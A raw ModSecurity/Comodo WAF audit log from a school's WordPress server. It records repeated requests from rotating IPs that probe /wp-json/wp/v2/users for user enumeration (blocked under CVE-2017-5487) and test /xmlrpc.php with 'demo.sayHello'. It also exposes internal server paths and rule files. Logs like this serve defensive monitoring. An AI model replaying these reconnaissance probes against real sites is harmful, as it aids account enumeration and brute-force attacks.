Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440971916659 4646 (- - -) Stopwatch2: 1747440971916659 4646; combined=3632, p1=429, p2=3006, p3=23, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4550217-Z-- --15284f55-A-- [17/May/2025:07:16:16 +0700] aCfVUHyxdQCiyU1ENFcmuQAAABQ 103.236.140.4 42572 103.236.140.4 8181 --15284f55-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15284f55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15284f55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440976773408 3276 (- - -) Stopwatch2: 1747440976773408 3276; combined=1385, p1=474, p2=880, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15284f55-Z-- --b09a0a3f-A-- [17/May/2025:07:16:20 +0700] aCfVVHyxdQCiyU1ENFcmugAAABU 103.236.140.4 42574 103.236.140.4 8181 --b09a0a3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b09a0a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b09a0a3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440980276368 2069 (- - -) Stopwatch2: 1747440980276368 2069; combined=968, p1=336, p2=605, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b09a0a3f-Z-- --90215007-A-- [17/May/2025:07:16:22 +0700] aCfVVnyxdQCiyU1ENFcmvAAAABg 103.236.140.4 42582 103.236.140.4 8181 --90215007-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90215007-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90215007-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440982426071 3077 (- - -) Stopwatch2: 1747440982426071 3077; combined=1310, p1=422, p2=858, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90215007-Z-- --06e94f12-A-- [17/May/2025:07:16:23 +0700] aCfVV3yxdQCiyU1ENFcmvQAAAAA 103.236.140.4 42586 103.236.140.4 8181 --06e94f12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06e94f12-C-- demo.sayHello --06e94f12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06e94f12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440983959220 4639 (- - -) Stopwatch2: 1747440983959220 4639; combined=3603, p1=427, p2=2981, p3=23, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06e94f12-Z-- --42c0332c-A-- [17/May/2025:07:16:25 +0700] aCfVWXyxdQCiyU1ENFcmwAAAAAI 103.236.140.4 42592 103.236.140.4 8181 --42c0332c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --42c0332c-C-- demo.sayHello --42c0332c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --42c0332c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440985633480 4623 (- - -) Stopwatch2: 1747440985633480 4623; combined=3600, p1=433, p2=2967, p3=24, p4=26, p5=88, sr=66, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42c0332c-Z-- --cda52f78-A-- [17/May/2025:07:16:28 +0700] aCfVXHyxdQCiyU1ENFcmwQAAAAM 103.236.140.4 42596 103.236.140.4 8181 --cda52f78-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cda52f78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda52f78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440988694795 2569 (- - -) Stopwatch2: 1747440988694795 2569; combined=1224, p1=412, p2=784, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda52f78-Z-- --a0da2326-A-- [17/May/2025:07:16:28 +0700] aCfVXATOsBn9MSWb6WJt4wAAAIs 103.236.140.4 42598 103.236.140.4 8181 --a0da2326-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.13.3 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.13.3 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0da2326-C-- demo.sayHello --a0da2326-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0da2326-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440988699286 17322 (- - -) Stopwatch2: 1747440988699286 17322; combined=28751, p1=425, p2=3170, p3=28, p4=31, p5=12566, sr=66, sw=81, l=0, gc=12450 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0da2326-Z-- --acb21d7d-A-- [17/May/2025:07:16:35 +0700] aCfVY3yxdQCiyU1ENFcmwwAAAAg 103.236.140.4 42606 103.236.140.4 8181 --acb21d7d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --acb21d7d-C-- demo.sayHello --acb21d7d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --acb21d7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440995380472 4020 (- - -) Stopwatch2: 1747440995380472 4020; combined=3153, p1=384, p2=2601, p3=20, p4=19, p5=76, sr=57, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acb21d7d-Z-- --eb49aa2c-A-- [17/May/2025:07:17:09 +0700] aCfVhQTOsBn9MSWb6WJt5QAAAIw 103.236.140.4 42610 103.236.140.4 8181 --eb49aa2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --eb49aa2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb49aa2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441029448141 3028 (- - -) Stopwatch2: 1747441029448141 3028; combined=1278, p1=434, p2=815, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb49aa2c-Z-- --61883f3c-A-- [17/May/2025:07:17:16 +0700] aCfVjBKi5m5upc8uMd6huQAAAME 103.236.140.4 42614 103.236.140.4 8181 --61883f3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.4 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61883f3c-C-- demo.sayHello --61883f3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61883f3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441036417720 6644 (- - -) Stopwatch2: 1747441036417720 6644; combined=4707, p1=603, p2=3863, p3=37, p4=41, p5=97, sr=79, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61883f3c-Z-- --a06bd874-A-- [17/May/2025:07:17:33 +0700] aCfVnem4kjNN-hEbWjJAsAAAAFE 103.236.140.4 42618 103.236.140.4 8181 --a06bd874-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a06bd874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06bd874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441053002533 3332 (- - -) Stopwatch2: 1747441053002533 3332; combined=1394, p1=460, p2=904, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06bd874-Z-- --b2721969-A-- [17/May/2025:07:17:34 +0700] aCfVnhKi5m5upc8uMd6hugAAAMQ 103.236.140.4 42620 103.236.140.4 8181 --b2721969-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b2721969-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2721969-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441054762131 2868 (- - -) Stopwatch2: 1747441054762131 2868; combined=1271, p1=439, p2=803, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2721969-Z-- --f99c460d-A-- [17/May/2025:07:17:39 +0700] aCfVo3yxdQCiyU1ENFcmxwAAABA 103.236.140.4 42626 103.236.140.4 8181 --f99c460d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.211 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f99c460d-C-- demo.sayHello --f99c460d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99c460d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441059262955 5080 (- - -) Stopwatch2: 1747441059262955 5080; combined=3852, p1=468, p2=3170, p3=22, p4=26, p5=96, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99c460d-Z-- --2f07201a-A-- [17/May/2025:07:17:40 +0700] aCfVpHyxdQCiyU1ENFcmyAAAABE 103.236.140.4 42628 103.236.140.4 8181 --2f07201a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f07201a-C-- demo.sayHello --2f07201a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f07201a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441060102598 5336 (- - -) Stopwatch2: 1747441060102598 5336; combined=4065, p1=503, p2=3349, p3=29, p4=32, p5=90, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f07201a-Z-- --cc24db41-A-- [17/May/2025:07:18:40 +0700] aCfV4BKi5m5upc8uMd6huwAAAMM 103.236.140.4 42636 103.236.140.4 8181 --cc24db41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cc24db41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc24db41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747441120967532 2664 (- - -) Stopwatch2: 1747441120967532 2664; combined=1127, p1=367, p2=737, p3=0, p4=0, p5=23, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc24db41-Z-- --41f0927f-A-- [17/May/2025:07:18:50 +0700] aCfV6hKi5m5upc8uMd6hvAAAAMU 103.236.140.4 42640 103.236.140.4 8181 --41f0927f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --41f0927f-C-- demo.sayHello --41f0927f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --41f0927f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747441130951777 6131 (- - -) Stopwatch2: 1747441130951777 6131; combined=4384, p1=636, p2=3517, p3=30, p4=37, p5=97, sr=137, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
